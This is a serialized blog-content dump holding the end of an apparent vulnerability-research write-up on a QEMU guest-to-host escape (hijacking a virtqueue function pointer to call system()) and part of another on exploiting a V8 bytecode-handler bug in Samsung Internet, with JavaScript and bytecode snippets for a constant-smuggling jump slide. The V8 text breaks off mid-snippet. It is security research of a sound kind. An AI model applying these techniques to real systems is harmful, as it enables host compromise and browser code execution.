",{"type":28,"tag":98,"props":131321,"children":131323},{"className":131322},[],[131324],{"type":33,"value":123726},{"type":33,"value":131326}," iovec - we can use the arbitrary read primitive to read its ",{"type":28,"tag":98,"props":131328,"children":131330},{"className":131329},[],[131331],{"type":33,"value":131332},".vq",{"type":33,"value":131334}," pointer, then follow that pointer to leak ",{"type":28,"tag":98,"props":131336,"children":131338},{"className":131337},[],[131339],{"type":33,"value":131088},{"type":33,"value":15714},{"type":28,"tag":98,"props":131342,"children":131344},{"className":131343},[],[131345],{"type":33,"value":130990},{"type":33,"value":131347}," structure. In our case, that field points to ",{"type":28,"tag":98,"props":131349,"children":131351},{"className":131350},[],[131352],{"type":33,"value":123378},{"type":33,"value":131354},", which gives us QEMU's base address.",{"type":28,"tag":29,"props":131356,"children":131357},{},[131358,131360,131366],{"type":33,"value":131359},"From there, we can use the arbitrary read primitive once more to read a resolved entry from QEMU's GOT, leaking a libc address. With that, we can compute the address of ",{"type":28,"tag":98,"props":131361,"children":131363},{"className":131362},[],[131364],{"type":33,"value":131365},"system",{"type":33,"value":141},{"type":28,"tag":75,"props":131368,"children":131370},{"id":131369},"rip-control",[131371],{"type":33,"value":131372},"RIP Control",{"type":28,"tag":29,"props":131374,"children":131375},{},[131376,131378,131383,131385,131391],{"type":33,"value":131377},"At this point, we have everything we need: an arbitrary read/write primitive, a QEMU code leak, and the address of ",{"type":28,"tag":98,"props":131379,"children":131381},{"className":131380},[],[131382],{"type":33,"value":131365},{"type":33,"value":131384},". To hijack control flow, we do not need to look far - we just described a function pointer on the heap at a known address: ",{"type":28,"tag":98,"props":131386,"children":131388},{"className":131387},[],[131389],{"type":33,"value":131390},"VirtQueue.handle_output",{"type":33,"value":141},{"type":28,"tag":29,"props":131393,"children":131394},{},[131395,131397,131402,131404,131409,131411,131416],{"type":33,"value":131396},"We overwrite ",{"type":28,"tag":98,"props":131398,"children":131400},{"className":131399},[],[131401],{"type":33,"value":131088},{"type":33,"value":131403}," with the address of ",{"type":28,"tag":98,"props":131405,"children":131407},{"className":131406},[],[131408],{"type":33,"value":131365},{"type":33,"value":131410}," and write the command string we want to execute into memory using our arbitrary write. Then we overwrite ",{"type":28,"tag":98,"props":131412,"children":131414},{"className":131413},[],[131415],{"type":33,"value":131096},{"type":33,"value":131417}," with the address of that command string, so it is passed as the first argument.",{"type":28,"tag":29,"props":131419,"children":131420},{},[131421,131423,131429,131431,131437,131439,131445],{"type":33,"value":131422},"Then, we simply notify the virtqueue from the guest. QEMU enters ",{"type":28,"tag":98,"props":131424,"children":131426},{"className":131425},[],[131427],{"type":33,"value":131428},"virtio_queue_notify_vq",{"type":33,"value":131430},", which calls ",{"type":28,"tag":98,"props":131432,"children":131434},{"className":131433},[],[131435],{"type":33,"value":131436},"vq->handle_output(vq->vdev)",{"type":33,"value":131438}," - or, after our overwrites, ",{"type":28,"tag":98,"props":131440,"children":131442},{"className":131441},[],[131443],{"type":33,"value":131444},"system(command)",{"type":33,"value":141},{"type":28,"tag":29,"props":131447,"children":131448},{},[131449,131451,131457,131459],{"type":33,"value":131450},"Finally, with all of this, we achieve a reliable guest-to-host escape and execute ",{"type":28,"tag":98,"props":131452,"children":131454},{"className":131453},[],[131455],{"type":33,"value":131456},"gnome-calculator",{"type":33,"value":131458}," on the host system:\n",{"type":28,"tag":30624,"props":131460,"children":131461},{},[],{"type":28,"tag":131463,"props":131464,"children":131472},"tweet-card",{"author-name":131465,"date":131466,"duration":131467,"handle":131468,"media-mime-type":131469,"media-src":131470,"media-type":1318,"tweet-url":131471},"OtterSec","March 5, 2026","0:12","@osec_io","video/mp4","/posts/virtio-snd-qemu-0day/demo.mp4","https://x.com/osec_io/status/2029643325125390550",[131473,131478,131483],{"type":28,"tag":29,"props":131474,"children":131475},{},[131476],{"type":33,"value":131477},"We recently achieved guest-to-host escape by exploiting a QEMU 0day.",{"type":28,"tag":29,"props":131479,"children":131480},{},[131481],{"type":33,"value":131482},"We’ll share details on a new technique leveraging the latest glibc allocator behavior and what we believe is a novel QEMU-specific heap spray/RIP-control primitive.",{"type":28,"tag":29,"props":131484,"children":131485},{},[131486],{"type":33,"value":131487},"Writeup coming next week.",{"type":28,"tag":30624,"props":131489,"children":131490},{},[],{"type":28,"tag":29,"props":131492,"children":131493},{},[131494,131496,131502,131504,131510],{"type":33,"value":131495},"The final exploit, targeting QEMU commit ",{"type":28,"tag":98,"props":131497,"children":131499},{"className":131498},[],[131500],{"type":33,"value":131501},"ece408818d27f745ef1b05fb3cc99a1e7a5bf580",{"type":33,"value":131503}," (Feb 13, 2026) and the latest glibc 2.43, can be found ",{"type":28,"tag":87,"props":131505,"children":131508},{"href":131506,"rel":131507},"https://github.com/otter-sec/qemu-escape",[91],[131509],{"type":33,"value":2039},{"type":33,"value":141},{"type":28,"tag":29,"props":131512,"children":131513},{},[131514,131516,131523],{"type":33,"value":131515},"Special thanks to ",{"type":28,"tag":87,"props":131517,"children":131520},{"href":131518,"rel":131519},"https://www.willsroot.io/",[91],[131521],{"type":33,"value":131522},"William Liu",{"type":33,"value":131524}," for proofreading this post and helping us polish it before publication.",{"type":28,"tag":63,"props":131526,"children":131527},{"id":2506},[131528],{"type":33,"value":2509},{"type":28,"tag":29,"props":131530,"children":131531},{},[131532],{"type":33,"value":131533},"Starting from a heap overflow where the written bytes are effectively random, we showed how careful heap grooming and a favorable change in glibc 2.43's allocator can turn even a single byte of uncontrolled corruption into a reliable guest-to-host escape.",{"type":28,"tag":29,"props":131535,"children":131536},{},[131537],{"type":33,"value":131538},"More broadly, this exploit is a reminder that weak-looking primitives should not be dismissed too quickly - with the right heap layout and target, even highly constrained corruption can be enough.",{"type":28,"tag":2516,"props":131540,"children":131541},{},[131542],{"type":33,"value":2520},{"title":7,"searchDepth":256,"depth":256,"links":131544},[131545,131548,131551,131560],{"id":123274,"depth":256,"text":123287,"children":131546},[131547],{"id":123295,"depth":293,"text":123298},{"id":123319,"depth":256,"text":123322,"children":131549},[131550],{"id":123333,"depth":293,"text":123333},{"id":99722,"depth":256,"text":99725,"children":131552},[131553,131554,131555,131556,131557,131558,131559],{"id":125925,"depth":293,"text":125928},{"id":127452,"depth":293,"text":127455},{"id":128246,"depth":293,"text":128249},{"id":128651,"depth":293,"text":128654},{"id":128867,"depth":293,"text":128870},{"id":129073,"depth":293,"text":129076},{"id":131369,"depth":293,"text":131372},{"id":2506,"depth":256,"text":2509},"content:blog:2026-03-17-virtio-snd-qemu-hypervisor-escape.md","blog/2026-03-17-virtio-snd-qemu-hypervisor-escape.md","blog/2026-03-17-virtio-snd-qemu-hypervisor-escape",{"_path":131565,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":131566,"description":131567,"date":131568,"author":131569,"image":131572,"isFeatured":19,"onBlogPage":19,"tags":131574,"body":131576,"_type":2534,"_id":141484,"_source":2536,"_file":141485,"_stem":141486,"_extension":2539},"/blog/2026-04-01-patch-gap-to-mobile-renderer-rce","Patch Gap to Mobile Renderer RCE: Pwning Samsung Internet's V8 on the Galaxy S25","Samsung Internet on the Galaxy S25 shipped a six-month-old version of V8, exposing it to publicly known bugs. Learn how we exploited a bytecode interpreter vulnerability to achieve renderer RCE and universal XSS in the browser.","2026-04-01T12:00:00.000Z",[123270,131570,131571],"jamie","william",{"src":131573,"width":17,"height":18},"/posts/mobile-renderer-rce/title.png",[131575,22],"RCE",{"type":25,"children":131577,"toc":141464},[131578,131582,131587,131601,131607,131621,131642,131650,131663,131671,131684,131690,131703,131717,131723,131737,131840,131845,131853,131858,131863,131884,131962,131970,131989,132002,132008,132014,132028,132144,132149,132154,132162,132167,132175,132203,132232,132244,132420,132425,132433,132452,132465,132471,132491,132505,132510,132515,132543,132579,132648,132654,132676,132681,132689,132702,132707,132715,132720,132759,132765,132778,132783,132961,132971,132979,132999,133023,133036,133042,133047,133689,133694,133702,133744,135733,135738,135746,135752,135785,135803,135973,136031,136056,136150,136155,136946,136951,136959,136970,139014,139019,139027,139033,139055,139069,139082,139094,139124,139129,139570,139598,139705,139722,139879,139884,139896,140192,140218,140241,140373,140385,140390,140542,140578,140591,140596,140718,140759,140836,140841,141415,141421,141433,141446,141450,141455,141460],{"type":28,"tag":63,"props":131579,"children":131580},{"id":28670},[131581],{"type":33,"value":28673},{"type":28,"tag":29,"props":131583,"children":131584},{},[131585],{"type":33,"value":131586},"The supply chain dependency in today's software landscape is extremely complex. Any vulnerability in a core library creates an exploitable window for its dependents - maintainers either fall behind on the exhausting update schedule, backport incorrectly, or even forget about it entirely.",{"type":28,"tag":29,"props":131588,"children":131589},{},[131590,131592,131599],{"type":33,"value":131591},"One such example is V8, a JavaScript engine used ubiquitously in Chromium and Node.js-based software. In collaboration with the ",{"type":28,"tag":87,"props":131593,"children":131596},{"href":131594,"rel":131595},"https://cor.team",[91],[131597],{"type":33,"value":131598},"Crusaders of Rust",{"type":33,"value":131600}," Security Research Group, we decided to analyze the version of V8 in Samsung Internet (the default browser on Samsung phones) on a Samsung Galaxy S25 in hopes of an n-day exploitation opportunity.",{"type":28,"tag":75,"props":131602,"children":131604},{"id":131603},"finding-the-v8-version",[131605],{"type":33,"value":131606},"Finding the V8 Version",{"type":28,"tag":29,"props":131608,"children":131609},{},[131610,131612,131619],{"type":33,"value":131611},"We started by pulling Samsung Internet's APK from the device over ",{"type":28,"tag":87,"props":131613,"children":131616},{"href":131614,"rel":131615},"https://developer.android.com/tools/adb",[91],[131617],{"type":33,"value":131618},"adb",{"type":33,"value":131620}," and inspecting the libraries it shipped with.",{"type":28,"tag":29,"props":131622,"children":131623},{},[131624,131626,131632,131634,131640],{"type":33,"value":131625},"After extracting the APK, we searched the ",{"type":28,"tag":98,"props":131627,"children":131629},{"className":131628},[],[131630],{"type":33,"value":131631},"lib/",{"type":33,"value":131633}," directory for ",{"type":28,"tag":98,"props":131635,"children":131637},{"className":131636},[],[131638],{"type":33,"value":131639},"v8::*",{"type":33,"value":131641}," symbols:",{"type":28,"tag":234,"props":131643,"children":131645},{"code":131644},"$ grep -r 'v8::' lib/\ngrep: lib/arm64-v8a/libterrace.so: binary file matches\n",[131646],{"type":28,"tag":98,"props":131647,"children":131648},{"__ignoreMap":7},[131649],{"type":33,"value":131644},{"type":28,"tag":29,"props":131651,"children":131652},{},[131653,131655,131661],{"type":33,"value":131654},"Only one file matched our search: ",{"type":28,"tag":98,"props":131656,"children":131658},{"className":131657},[],[131659],{"type":33,"value":131660},"libterrace.so",{"type":33,"value":131662},". We then loaded it into a decompiler to inspect it more closely, which is where we found the bundled V8 version:",{"type":28,"tag":29,"props":131664,"children":131665},{},[131666],{"type":28,"tag":206,"props":131667,"children":131670},{"alt":131668,"src":131669},"image1","/posts/mobile-renderer-rce/image1.png",[],{"type":28,"tag":29,"props":131672,"children":131673},{},[131674,131676,131682],{"type":33,"value":131675},"Surprisingly, this ",{"type":28,"tag":98,"props":131677,"children":131679},{"className":131678},[],[131680],{"type":33,"value":131681},"13.6.233.10",{"type":33,"value":131683}," version was already six months old at the time, with multiple publicly known bugs affecting it.",{"type":28,"tag":75,"props":131685,"children":131687},{"id":131686},"choosing-the-bug",[131688],{"type":33,"value":131689},"Choosing the Bug",{"type":28,"tag":29,"props":131691,"children":131692},{},[131693,131695,131701],{"type":33,"value":131694},"We were able to trigger a couple of bugs on our locally compiled ",{"type":28,"tag":98,"props":131696,"children":131698},{"className":131697},[],[131699],{"type":33,"value":131700},"d8",{"type":33,"value":131702}," matching the target version. One of them was CVE-2025-5419 - a store-store elimination bug that we managed to get working on the device. However, exploitation required heap spraying, which would present significant stability issues when porting to the phone.",{"type":28,"tag":29,"props":131704,"children":131705},{},[131706,131708,131715],{"type":33,"value":131707},"Another one was ",{"type":28,"tag":87,"props":131709,"children":131712},{"href":131710,"rel":131711},"https://issuetracker.google.com/issues/443875388",[91],[131713],{"type":33,"value":131714},"CVE-2025-10891",{"type":33,"value":131716}," - a bug in the Ignition bytecode interpreter. This one was attractive as bytecode is treated as trusted under the V8 sandbox model, meaning that a separate Übercage bypass would not be required. Given this, we decided to explore this bug further.",{"type":28,"tag":63,"props":131718,"children":131720},{"id":131719},"ignition-bytecode-introduction",[131721],{"type":33,"value":131722},"Ignition Bytecode Introduction",{"type":28,"tag":29,"props":131724,"children":131725},{},[131726,131728,131735],{"type":33,"value":131727},"V8 initially compiles all JS code to a bytecode format with the ",{"type":28,"tag":87,"props":131729,"children":131732},{"href":131730,"rel":131731},"https://v8.dev/blog/ignition-interpreter",[91],[131733],{"type":33,"value":131734},"Ignition",{"type":33,"value":131736}," interpreter.\nThis is a simple register-based VM with fixed size opcodes (and prefix bytes to increase operand width). For instance:",{"type":28,"tag":234,"props":131738,"children":131740},{"code":131739,"language":31017,"meta":7,"className":31015,"style":7},"let a = 1;\nlet b = 0x0fff;\nlet c = 0x0fffffff;\nlet d = 0xffffffff;\n",[131741],{"type":28,"tag":98,"props":131742,"children":131743},{"__ignoreMap":7},[131744,131767,131791,131815],{"type":28,"tag":116,"props":131745,"children":131746},{"class":245,"line":246},[131747,131751,131755,131759,131763],{"type":28,"tag":116,"props":131748,"children":131749},{"style":376},[131750],{"type":33,"value":11455},{"type":28,"tag":116,"props":131752,"children":131753},{"style":272},[131754],{"type":33,"value":89454},{"type":28,"tag":116,"props":131756,"children":131757},{"style":370},[131758],{"type":33,"value":2226},{"type":28,"tag":116,"props":131760,"children":131761},{"style":350},[131762],{"type":33,"value":4192},{"type":28,"tag":116,"props":131764,"children":131765},{"style":266},[131766],{"type":33,"value":384},{"type":28,"tag":116,"props":131768,"children":131769},{"class":245,"line":256},[131770,131774,131778,131782,131787],{"type":28,"tag":116,"props":131771,"children":131772},{"style":376},[131773],{"type":33,"value":11455},{"type":28,"tag":116,"props":131775,"children":131776},{"style":272},[131777],{"type":33,"value":90328},{"type":28,"tag":116,"props":131779,"children":131780},{"style":370},[131781],{"type":33,"value":2226},{"type":28,"tag":116,"props":131783,"children":131784},{"style":350},[131785],{"type":33,"value":131786}," 0x0fff",{"type":28,"tag":116,"props":131788,"children":131789},{"style":266},[131790],{"type":33,"value":384},{"type":28,"tag":116,"props":131792,"children":131793},{"class":245,"line":293},[131794,131798,131802,131806,131811],{"type":28,"tag":116,"props":131795,"children":131796},{"style":376},[131797],{"type":33,"value":11455},{"type":28,"tag":116,"props":131799,"children":131800},{"style":272},[131801],{"type":33,"value":1740},{"type":28,"tag":116,"props":131803,"children":131804},{"style":370},[131805],{"type":33,"value":2226},{"type":28,"tag":116,"props":131807,"children":131808},{"style":350},[131809],{"type":33,"value":131810}," 0x0fffffff",{"type":28,"tag":116,"props":131812,"children":131813},{"style":266},[131814],{"type":33,"value":384},{"type":28,"tag":116,"props":131816,"children":131817},{"class":245,"line":361},[131818,131822,131827,131831,131836],{"type":28,"tag":116,"props":131819,"children":131820},{"style":376},[131821],{"type":33,"value":11455},{"type":28,"tag":116,"props":131823,"children":131824},{"style":272},[131825],{"type":33,"value":131826}," d",{"type":28,"tag":116,"props":131828,"children":131829},{"style":370},[131830],{"type":33,"value":2226},{"type":28,"tag":116,"props":131832,"children":131833},{"style":350},[131834],{"type":33,"value":131835}," 0xffffffff",{"type":28,"tag":116,"props":131837,"children":131838},{"style":266},[131839],{"type":33,"value":384},{"type":28,"tag":29,"props":131841,"children":131842},{},[131843],{"type":33,"value":131844},"compiles to",{"type":28,"tag":234,"props":131846,"children":131848},{"code":131847}," # Load the Smi `1` into the accumulator\n 0 : 0d 01             LdaSmi [1]\n # Store it to register 0\n 2 : ce                Star0\n # Load the 2-byte Smi `0xfff` into acc\n 3 : 00 0d ff 0f       LdaSmi.Wide [4095]\n # Store it to register 1\n 7 : cd                Star1\n # Load the 4-byte Smi `0xfffffff` into acc\n 8 : 01 0d ff ff ff 0f LdaSmi.ExtraWide [268435455]\n # Store it to register 2\n14 : cc                Star2\n# `0xffffffff` doesn't fit into an Smi, so a `HeapNumber` is allocated in the function's constant pool and loaded\n15 : 13 00             LdaConstant [0]\n# Store it to register 3\n17 : cb                Star3\n18 : 0e                LdaUndefined\n19 : b3                Return\n",[131849],{"type":28,"tag":98,"props":131850,"children":131851},{"__ignoreMap":7},[131852],{"type":33,"value":131847},{"type":28,"tag":29,"props":131854,"children":131855},{},[131856],{"type":33,"value":131857},"Ignition bytecode is then passed through the Sparkplug, Maglev, and Turbofan JIT compilers depending on the required amount of optimization. Yes, V8 has FOUR compilers, all so that slop devs can continue \"engineering\" their RAM-hungry, CPU-draining web apps that have plagued the modern internet.",{"type":28,"tag":75,"props":131859,"children":131861},{"id":131860},"cve-2025-10891",[131862],{"type":33,"value":131714},{"type":28,"tag":29,"props":131864,"children":131865},{},[131866,131868,131874,131876,131882],{"type":33,"value":131867},"The bug is in the handling of try/catch blocks. These are encoded in a function as a list of ",{"type":28,"tag":98,"props":131869,"children":131871},{"className":131870},[],[131872],{"type":33,"value":131873},"[start, end) => handler",{"type":33,"value":131875}," offsets - if an exception is thrown in the given bytecode address range, ",{"type":28,"tag":98,"props":131877,"children":131879},{"className":131878},[],[131880],{"type":33,"value":131881},"handler",{"type":33,"value":131883}," is jumped to.",{"type":28,"tag":234,"props":131885,"children":131887},{"code":131886,"language":31017,"meta":7,"className":31015,"style":7},"try {\n  throw 1;\n} catch {\n  let b = 2;\n}\n",[131888],{"type":28,"tag":98,"props":131889,"children":131890},{"__ignoreMap":7},[131891,131902,131917,131932,131955],{"type":28,"tag":116,"props":131892,"children":131893},{"class":245,"line":246},[131894,131898],{"type":28,"tag":116,"props":131895,"children":131896},{"style":260},[131897],{"type":33,"value":47955},{"type":28,"tag":116,"props":131899,"children":131900},{"style":266},[131901],{"type":33,"value":1291},{"type":28,"tag":116,"props":131903,"children":131904},{"class":245,"line":256},[131905,131909,131913],{"type":28,"tag":116,"props":131906,"children":131907},{"style":260},[131908],{"type":33,"value":34828},{"type":28,"tag":116,"props":131910,"children":131911},{"style":350},[131912],{"type":33,"value":4192},{"type":28,"tag":116,"props":131914,"children":131915},{"style":266},[131916],{"type":33,"value":384},{"type":28,"tag":116,"props":131918,"children":131919},{"class":245,"line":293},[131920,131924,131928],{"type":28,"tag":116,"props":131921,"children":131922},{"style":266},[131923],{"type":33,"value":46499},{"type":28,"tag":116,"props":131925,"children":131926},{"style":260},[131927],{"type":33,"value":48033},{"type":28,"tag":116,"props":131929,"children":131930},{"style":266},[131931],{"type":33,"value":1291},{"type":28,"tag":116,"props":131933,"children":131934},{"class":245,"line":361},[131935,131939,131943,131947,131951],{"type":28,"tag":116,"props":131936,"children":131937},{"style":376},[131938],{"type":33,"value":7527},{"type":28,"tag":116,"props":131940,"children":131941},{"style":272},[131942],{"type":33,"value":90328},{"type":28,"tag":116,"props":131944,"children":131945},{"style":370},[131946],{"type":33,"value":2226},{"type":28,"tag":116,"props":131948,"children":131949},{"style":350},[131950],{"type":33,"value":7606},{"type":28,"tag":116,"props":131952,"children":131953},{"style":266},[131954],{"type":33,"value":384},{"type":28,"tag":116,"props":131956,"children":131957},{"class":245,"line":387},[131958],{"type":28,"tag":116,"props":131959,"children":131960},{"style":266},[131961],{"type":33,"value":406},{"type":28,"tag":234,"props":131963,"children":131965},{"code":131964}," 0 : 1b ff f8          Mov \u003Ccontext>, r1\n # Start of try block\n # ---------------------------------\n 3 : 0d 01             LdaSmi [1]\n 5 : b1                Throw\n # ---------------------------------\n 6 : 10                LdaTheHole\n 7 : b0                SetPendingMessage\n # Start of catch handler\n 8 : 0d 02             LdaSmi [2]\n10 : ce                Star0\n11 : 0e                LdaUndefined\n12 : b3                Return\nHandler Table (size = 16)\n   from   to       hdlr (prediction,   data)\n  (   3,   6)  ->     6 (prediction=1, data=1)\n",[131966],{"type":28,"tag":98,"props":131967,"children":131968},{"__ignoreMap":7},[131969],{"type":33,"value":131964},{"type":28,"tag":29,"props":131971,"children":131972},{},[131973,131975,131980,131982,131987],{"type":33,"value":131974},"However, the ",{"type":28,"tag":98,"props":131976,"children":131978},{"className":131977},[],[131979],{"type":33,"value":131881},{"type":33,"value":131981}," offset is stored in a 28-bit bitfield. If the address of the ",{"type":28,"tag":98,"props":131983,"children":131985},{"className":131984},[],[131986],{"type":33,"value":48033},{"type":33,"value":131988}," block does not fit within 28 bits, it will be silently truncated. This will lead to a jump into a completely different part of the code - even in the middle of an instruction.",{"type":28,"tag":29,"props":131990,"children":131991},{},[131992,131994,132000],{"type":33,"value":131993},"One easy way to generate a large enough function, as suggested in the initial report, is to emit many ",{"type":28,"tag":98,"props":131995,"children":131997},{"className":131996},[],[131998],{"type":33,"value":131999},"yield*",{"type":33,"value":132001}," statements, as that drastically increases the size of the Ignition bytecode.",{"type":28,"tag":63,"props":132003,"children":132005},{"id":132004},"exploitation",[132006],{"type":33,"value":132007},"Exploitation",{"type":28,"tag":75,"props":132009,"children":132011},{"id":132010},"constant-smuggling",[132012],{"type":33,"value":132013},"Constant Smuggling",{"type":28,"tag":29,"props":132015,"children":132016},{},[132017,132019,132026],{"type":33,"value":132018},"Our initial approach to exploitation was inspired by the 'shellcode smuggling' ",{"type":28,"tag":87,"props":132020,"children":132023},{"href":132021,"rel":132022},"https://blog.exodusintel.com/2024/01/19/google-chrome-v8-cve-2024-0517-out-of-bounds-write-code-execution/",[91],[132024],{"type":33,"value":132025},"technique",{"type":33,"value":132027}," - when arbitrary read-write is achieved in browser exploits, we can often JIT compile a function like this:",{"type":28,"tag":234,"props":132029,"children":132031},{"code":132030,"language":31017,"meta":7,"className":31015,"style":7},"let a = -9.255963134931783e61;\nlet b = -9.255963134931783e61;\nlet c = -9.255963134931783e61;\nlet d = -9.255963134931783e61;\n",[132032],{"type":28,"tag":98,"props":132033,"children":132034},{"__ignoreMap":7},[132035,132063,132090,132117],{"type":28,"tag":116,"props":132036,"children":132037},{"class":245,"line":246},[132038,132042,132046,132050,132054,132059],{"type":28,"tag":116,"props":132039,"children":132040},{"style":376},[132041],{"type":33,"value":11455},{"type":28,"tag":116,"props":132043,"children":132044},{"style":272},[132045],{"type":33,"value":89454},{"type":28,"tag":116,"props":132047,"children":132048},{"style":370},[132049],{"type":33,"value":2226},{"type":28,"tag":116,"props":132051,"children":132052},{"style":370},[132053],{"type":33,"value":50874},{"type":28,"tag":116,"props":132055,"children":132056},{"style":350},[132057],{"type":33,"value":132058},"9.255963134931783e61",{"type":28,"tag":116,"props":132060,"children":132061},{"style":266},[132062],{"type":33,"value":384},{"type":28,"tag":116,"props":132064,"children":132065},{"class":245,"line":256},[132066,132070,132074,132078,132082,132086],{"type":28,"tag":116,"props":132067,"children":132068},{"style":376},[132069],{"type":33,"value":11455},{"type":28,"tag":116,"props":132071,"children":132072},{"style":272},[132073],{"type":33,"value":90328},{"type":28,"tag":116,"props":132075,"children":132076},{"style":370},[132077],{"type":33,"value":2226},{"type":28,"tag":116,"props":132079,"children":132080},{"style":370},[132081],{"type":33,"value":50874},{"type":28,"tag":116,"props":132083,"children":132084},{"style":350},[132085],{"type":33,"value":132058},{"type":28,"tag":116,"props":132087,"children":132088},{"style":266},[132089],{"type":33,"value":384},{"type":28,"tag":116,"props":132091,"children":132092},{"class":245,"line":293},[132093,132097,132101,132105,132109,132113],{"type":28,"tag":116,"props":132094,"children":132095},{"style":376},[132096],{"type":33,"value":11455},{"type":28,"tag":116,"props":132098,"children":132099},{"style":272},[132100],{"type":33,"value":1740},{"type":28,"tag":116,"props":132102,"children":132103},{"style":370},[132104],{"type":33,"value":2226},{"type":28,"tag":116,"props":132106,"children":132107},{"style":370},[132108],{"type":33,"value":50874},{"type":28,"tag":116,"props":132110,"children":132111},{"style":350},[132112],{"type":33,"value":132058},{"type":28,"tag":116,"props":132114,"children":132115},{"style":266},[132116],{"type":33,"value":384},{"type":28,"tag":116,"props":132118,"children":132119},{"class":245,"line":361},[132120,132124,132128,132132,132136,132140],{"type":28,"tag":116,"props":132121,"children":132122},{"style":376},[132123],{"type":33,"value":11455},{"type":28,"tag":116,"props":132125,"children":132126},{"style":272},[132127],{"type":33,"value":131826},{"type":28,"tag":116,"props":132129,"children":132130},{"style":370},[132131],{"type":33,"value":2226},{"type":28,"tag":116,"props":132133,"children":132134},{"style":370},[132135],{"type":33,"value":50874},{"type":28,"tag":116,"props":132137,"children":132138},{"style":350},[132139],{"type":33,"value":132058},{"type":28,"tag":116,"props":132141,"children":132142},{"style":266},[132143],{"type":33,"value":384},{"type":28,"tag":29,"props":132145,"children":132146},{},[132147],{"type":33,"value":132148},"These floating-point constants will compile to 8-byte constants inside the machine code (the last 2 of which are used to jump into the next constant).",{"type":28,"tag":29,"props":132150,"children":132151},{},[132152],{"type":33,"value":132153},"We'll use a similar principle here, although much more limited. With",{"type":28,"tag":234,"props":132155,"children":132157},{"code":132156},"let a = 0x0693bebe;\n",[132158],{"type":28,"tag":98,"props":132159,"children":132160},{"__ignoreMap":7},[132161],{"type":33,"value":132156},{"type":28,"tag":29,"props":132163,"children":132164},{},[132165],{"type":33,"value":132166},"We will compile the bytecode:",{"type":28,"tag":234,"props":132168,"children":132170},{"code":132169},"01 0d be be 93 06 LdaSmi.ExtraWide\n",[132171],{"type":28,"tag":98,"props":132172,"children":132173},{"__ignoreMap":7},[132174],{"type":33,"value":132169},{"type":28,"tag":29,"props":132176,"children":132177},{},[132178,132180,132186,132188,132194,132195,132201],{"type":33,"value":132179},"We can then jump to the 3rd byte (",{"type":28,"tag":98,"props":132181,"children":132183},{"className":132182},[],[132184],{"type":33,"value":132185},"0xbe",{"type":33,"value":132187},"), and gain 2 controlled bytes of execution, followed by ",{"type":28,"tag":98,"props":132189,"children":132191},{"className":132190},[],[132192],{"type":33,"value":132193},"0x93 0x02 - 0xf",{"type":33,"value":269},{"type":28,"tag":98,"props":132196,"children":132198},{"className":132197},[],[132199],{"type":33,"value":132200},"Jump +[2-15]",{"type":33,"value":132202},") to jump into the next constant.",{"type":28,"tag":29,"props":132204,"children":132205},{},[132206,132208,132214,132216,132222,132224,132230],{"type":33,"value":132207},"Note that the jump constant will change as the subsequent store instruction becomes longer due to storing to deeper registers. Storing to registers 1-15 resulted in simple one byte ",{"type":28,"tag":98,"props":132209,"children":132211},{"className":132210},[],[132212],{"type":33,"value":132213},"StarX",{"type":33,"value":132215}," instructions, registers 16-121 resulted in two bytes ",{"type":28,"tag":98,"props":132217,"children":132219},{"className":132218},[],[132220],{"type":33,"value":132221},"Star rX",{"type":33,"value":132223}," instructions, and the next batch resulted in 4 byte ",{"type":28,"tag":98,"props":132225,"children":132227},{"className":132226},[],[132228],{"type":33,"value":132229},"Star.ExtraWide rX",{"type":33,"value":132231}," instructions.",{"type":28,"tag":29,"props":132233,"children":132234},{},[132235,132237,132243],{"type":33,"value":132236},"With these short jumps, we can actually construct a massive jump slide of constants like ",{"type":28,"tag":98,"props":132238,"children":132240},{"className":132239},[],[132241],{"type":33,"value":132242},"0x8931111",{"type":33,"value":4160},{"type":28,"tag":234,"props":132245,"children":132247},{"code":132246,"language":31017,"meta":7,"className":31015,"style":7},"let a206 = 0x8931111;\nlet a207 = 0x8931111;\nlet a208 = 0x8931111;\nlet a209 = 0x8931111;\nlet a210 = 0x8931111;\nlet a211 = 0x8931111;\nlet a212 = 0x8931111;\n",[132248],{"type":28,"tag":98,"props":132249,"children":132250},{"__ignoreMap":7},[132251,132276,132300,132324,132348,132372,132396],{"type":28,"tag":116,"props":132252,"children":132253},{"class":245,"line":246},[132254,132258,132263,132267,132272],{"type":28,"tag":116,"props":132255,"children":132256},{"style":376},[132257],{"type":33,"value":11455},{"type":28,"tag":116,"props":132259,"children":132260},{"style":272},[132261],{"type":33,"value":132262}," a206",{"type":28,"tag":116,"props":132264,"children":132265},{"style":370},[132266],{"type":33,"value":2226},{"type":28,"tag":116,"props":132268,"children":132269},{"style":350},[132270],{"type":33,"value":132271}," 0x8931111",{"type":28,"tag":116,"props":132273,"children":132274},{"style":266},[132275],{"type":33,"value":384},{"type":28,"tag":116,"props":132277,"children":132278},{"class":245,"line":256},[132279,132283,132288,132292,132296],{"type":28,"tag":116,"props":132280,"children":132281},{"style":376},[132282],{"type":33,"value":11455},{"type":28,"tag":116,"props":132284,"children":132285},{"style":272},[132286],{"type":33,"value":132287}," a207",{"type":28,"tag":116,"props":132289,"children":132290},{"style":370},[132291],{"type":33,"value":2226},{"type":28,"tag":116,"props":132293,"children":132294},{"style":350},[132295],{"type":33,"value":132271},{"type":28,"tag":116,"props":132297,"children":132298},{"style":266},[132299],{"type":33,"value":384},{"type":28,"tag":116,"props":132301,"children":132302},{"class":245,"line":293},[132303,132307,132312,132316,132320],{"type":28,"tag":116,"props":132304,"children":132305},{"style":376},[132306],{"type":33,"value":11455},{"type":28,"tag":116,"props":132308,"children":132309},{"style":272},[132310],{"type":33,"value":132311}," a208",{"type":28,"tag":116,"props":132313,"children":132314},{"style":370},[132315],{"type":33,"value":2226},{"type":28,"tag":116,"props":132317,"children":132318},{"style":350},[132319],{"type":33,"value":132271},{"type":28,"tag":116,"props":132321,"children":132322},{"style":266},[132323],{"type":33,"value":384},{"type":28,"tag":116,"props":132325,"children":132326},{"class":245,"line":361},[132327,132331,132336,132340,132344],{"type":28,"tag":116,"props":132328,"children":132329},{"style":376},[132330],{"type":33,"value":11455},{"type":28,"tag":116,"props":132332,"children":132333},{"style":272},[132334],{"type":33,"value":132335}," 